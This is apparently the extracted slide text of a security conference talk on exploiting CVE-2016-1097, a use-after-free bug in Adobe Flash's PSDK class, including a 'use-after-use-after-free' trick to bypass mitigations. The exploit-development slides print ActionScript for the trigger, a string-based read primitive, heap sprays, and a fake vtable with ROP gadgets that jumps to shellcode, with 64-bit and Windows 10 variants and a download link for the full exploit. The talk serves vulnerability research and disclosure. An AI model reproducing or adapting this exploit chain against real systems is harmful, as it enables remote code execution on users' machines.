Guanxing Wen

Use-After-Use-After-FreeExploit UAF by Genrating Your Own

✤ Security Researcher at Pangu LAB

✤ Enthusiastic about Flash: ✤ Advanced vulnerability exploitation ✤ Find vulnerabilities

About Me

CVE-2016-1097

@hhj4ck

Internet Bug Bounty

✤ Basis of Flash Exploition & Mitigation

✤ Overview of

Agenda

✤ Use-After-Use-After-Free (UAUAF): Go Beyond Mitigation

✤ Building the Exploit from Scratch

✤ Tips for 64-bit platform & Windows 10 Exploitation

✤ Conclusion

CVE-2016-1097

Flash Exploit

✤ Heap Overflow

vector vulnerable buffer vectorvector vector

length

Flash Exploit

✤ Heap Overflow

vector vulnerable buffer vectorvector

length

Flash Exploit

✤ Heap Overflow

vector vulnerable buffer vectorvectorRead Primitive

length

Flash Exploit

✤ Heap Overflow

vector vulnerable buffer vectorvectorRead Primitive

✤ Use-After-Free

vectorvector vector vectorvector vector

vector vectorvector vector

vectorvector vector vectorvector vector

vulnerable object

length

Flash Exploit

✤ Heap Overflow

vector vulnerable buffer vectorvectorRead Primitive

✤ Use-After-Free

vectorvector vector vectorvector vector

vector vectorvector vector

vectorvector vector vectorvector vector

vulnerable object

vectorvector vector vectorvector length

vector vectorvector vector

vectorvector vector vectorvector vector

vulnerable object

Flash Exploit

✤ Use-After-Free

length

✤ Heap Overflow

vector vulnerable buffer vectorvectorRead Primitive

Read Primitive

MMgc

Mitigations

vtablerefcount

dummydummy

dummy

01

buffer

length

data

Vector

Mitigations

MMgcvtable

refcount

dummydummy

dummy

01

buffer

length

data

Vector

MMgc

vtablerefcount

dummydummy

dummy

0

data

buffer

length

Vectorcookie

✤ length verification

Mitigations

vtablerefcount

capacitylength

array

copyOnWritecheck_array

check_length

vtablerefcount

capacitylength

array

copyOnWrite

check_capacity

check_copyOnWrite

ByteArray ByteArray

✤ length verification

StringBuffer LargeObjectTracker JSONSerializer DataList GCBitmap ZCT MMGCMetaData FastAllocator Code ByteArray

ByteArray & Vector

AS3 Objects

✤ Isolated Heap

Mitigations

MMgc

MMgc

ByteArray & Vector

AS3 Objects

✤ Isolated Heap

Mitigations

Free

mem

Mitigations

Heap Fengshui

Overflow

Read Primitive Gained

Find ROP Gadgets

Fake Vtable - RCE

Proper Occupation

Invoke Virtual Method

Heap Fengshui

Read Primitive Gained

Find ROP Gadgets

Fake Vtable - RCE

✤ Heap Overflow ✤ Use-After-Free

length verification

isolated heap

Mitigations

Heap Fengshui

Overflow

Read Primitive Gained

Find ROP Gadgets

Fake Vtable - RCE

Proper Occupation

Invoke Virtual Method

Heap Fengshui

Read Primitive Gained

Find ROP Gadgets

Fake Vtable - RCE

✤ Heap Overflow ✤ Use-After-Free

length verification

isolated heap

What is really necessary

What is really necessary

✤ Read Primitive

✤ buffer[index]✤ find ROP gadgets, wrappers

✤ index < 0xFFFFFFFF ?

What is really necessary

✤ Read Primitive

✤ buffer[index]✤ find ROP gadgets, wrappers

✤ index < 0xFFFFFFFF ?✤ buffer = Vector / ByteArray ?

vtablerefcount

lengthbuffer

…

String

vtablerefcount

lengthbuffer

…

String

vtablerefcount

4Address

…

vtablerefcount

4Address

…

vtablerefcount

4Address

…

Use-After-Use-After-Free

vtablerefcount

lengthbuffer

…

String obj.str is Read Primitive

vtablerefcount

lengthbuffer

…

Use-After-Use-After-Free

vulnerableobject

vtablerefcount

lengthbuffer

…

Use-After-Use-After-Free

vulnobj.funcX obj.funcYvtablerefcount

lengthbuffer

…

Use-After-Use-After-Free

vtablerefcount

lengthbuffer

…

Use-After-Use-After-Free

✤ Free: Vulnerable object is released

✤ Use: Occupied with selected object

Use-After-Use-After-Free

✤ Free: Release selected object (type confused call)

✤ Use: Modify the address field via occupation

✤ obj.str of becomes a Read Primitive

✤ Free: Release the memory for next occupation

Overview of CVE-2016-1097

✤ Introduced in Flash Player 19 beta✤ playerglobal.swc + FFDEC + Beyond Compare

com.adobe.tvsdk.mediacore.PSDK

com.adobe.tvsdk.mediacore.PSDK

✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare

✤ Introduced in Flash Player 19 beta

✤ Introduced in Flash Player 19 beta

✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare

✤ Buggy

com.adobe.tvsdk.mediacore.PSDK

✤ Introduced in Flash Player 19 beta

✤ Eliminated from Flash Player 19 release✤ Recurred in Flash 21 beta

✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare

✤ Buggy

com.adobe.tvsdk.mediacore.PSDK

CVE-2016-1097

function poc() { var ps:PSDK = PSDK.pSDK; ps.release(); ps.createdispatcher(); }

constructed automatically

atom is remained

inner memory is freed

Exploit Development

PSDK Class

vtable1vtable2

dummydummy

dummydummydummydummy

ps.createDispatcher()…~PSDK()

0x20

Proper Occupation

com.adobe.mediacore.PSDK

ContentFactory

Proper Occupation

com.adobe.mediacore.PSDK

ContentFactory

Proper Occupation

com.adobe.mediacore.PSDK

MediaPlayer

metadata.MetaData

ContentFactory

Proper Occupation

com.adobe.mediacore.MediaPlayer

metadata.MetaData

Proper Occupation

com.adobe.mediacore.MediaPlayer

info.Track

Proper Occupation

com.adobe.mediacore.info.Track

Proper Occupation

Track name:String language:String( , )…

Proper Occupation

Trackvtablelength

lengthbuffer

bufferflags

--

name:String

language:String

vtable1vtable2

dummydummy

dummydummydummydummy

Type Confusion Call

ps.createDispatcher()PSDK

vtablelength

lengthbuffer

bufferflags

--

Track

ps.createDispatcher() vtablelength

lengthbuffer

bufferflags

--

Track

Type Confusion Call

vtable1vtable2

dummydummy

dummydummydummydummy

Type Confusion Call

ps.createDispatcher()PSDK

vtablelength

lengthbuffer

bufferflags

--

Trackvtable1vtable2

dummydummy

dummydummydummydummy

Type Confusion Call

ps.createDispatcher()PSDK

vtable1

lengthj

bufferflags

--

Trackvtable1vtable2

dummydummy

dummydummydummydummy

Type Confusion Call

ps.createDispatcher()PSDK

vtable0

lengthj

bufferflags

--

Trackvtable1vtable2

dummydummy

dummydummydummydummy

Type Confusion Call

ps.createDispatcher() vtable1vtable2

dummydummy

dummydummydummydummy

PSDKvtablelength

lengthbuffer

bufferflags

--

Track

vtablelength

lengthbuffer

bufferflags

--

Track

Type Confusion Call

Metadata.setByteArray(key:String, obj:ByteArray)

Metadata.setByteArray

✤ Alloc a temporary space

✤ Release the temporary space

✤ Do some calculation

var mt:Metadata = new Metadata(); var bytes:ByteArray = new ByteArray(); bytes.length = 0x20; bytes.postion = 0x0C; bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();

proper occupation

release the memory block of Track

bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();

bytes.postion = 0x10; bytes.writeUnsignedInt(0xadd7e555); mt.setByteArray("address", bytes); res = track.language; value = (res.charCodeAt(3)<<24) value|= (res.charCodeAt(2)<<16) value|= (res.charCodeAt(1)<<8) value|= (res.charCodeAt(0));

Read Primitive

Code Execution

✤ Spray with Vector.<this> public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;

} }

Code Execution

✤ Spray with Vector.<this>

this atom

public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;

} }

Code Execution

✤ Find buffers through *this (HT tricks)

Code Execution

✤ Find buffers through *this (HT tricks)

Code Execution

✤ Find buffers through *this (HT tricks)

var ulimit_bytes:ByteArray; var output:String; var track:Track; var gc_arr:Array; var fill_bytes:ByteArray; var shellcode:ByteArray;

vtable1vtable2

dummydummy

dummydummydummydummy

Code Execution

✤ Build a fake vtable with gadgets

~PSDK()

Code Execution

✤ Build a fake vtable with gadgets

xchg eax, esp # pop esi # pop ebx # retnxchg eax, esi # retnpush 1 # push [eax-8] # push [eax-4] # call wrapper

jump to shellcode

=> esi~PSDK()

DEMO

64-bit Exploit

ps = PSDK.pSDK; proper occupation

release the memory of MediaResource

ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}

64-bit Exploit

64-bit Exploit

var bytes:ByteArray = new ByteArray(); bytes.endian = "littleEndian"; bytes.position = 0x30; bytes.writeInt(1); mt.setByteArray("jack", bytes);

ps = PSDK.pSDK;

ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}

64-bit Exploit

✤ Heap Spray MMgc Object

64-bit Exploit

✤ Heap Spray malloced Objectsgc_arr = new Array(); ad = new AdClick("","",""); ms = new MediaResource("jack",0x54336677,null); mt = new MetaData(); for(var i=0;i<0x80000;i++) { gc_arr[i]=new AdAsset("",1,ms,ad,mt); }

64-bit Exploit

✤ Heap Spray malloced Objects

Metadata

Flag

64-bit Exploit

Metadata

+0 vtable+8 dumy

…+10 dumy

+120 ptr

64-bit Exploit

Metadata

+0 vtable+8 dumy

…+10 dumy

+120 ptr

+0 dumy…

+hash*8

+0 dumy+8 dumy+10 ptr

+0 dumy+8 dumy+10 dumy+18 ptr bytes

hash = func(name) hash = [0,7] hash("vtable") = 3 hash("shellc0de") = 4 hash("param") = 0

.setByteArray(name, bytes);

Windows 10 Tips

✤ PSDK is malloced ✤ LFH randomisation✤ Multiple occupation

ps.release(); for(i=0;i<0x100;i++) track = new Track("j","lan",true,true); ps.createAdPolicySelector(1,mp);

Windows 10 Tips

1

Conclusion

✤ The Fix✤ remove the reference manually after release()

✤ bypass: declare two of them (CVE-2016-4248)

✤ remove the release() from AS3 level ✤ Use-After-Use-After-Free

✤ relatively common way to retrieve a Read Primitive✤ replace String with other structure ?= Write Primitive

✤ Memory Protector has no effects

Q & A

Thanks for your attention

Download everything from: http://www.hhjack.com/psdk.zip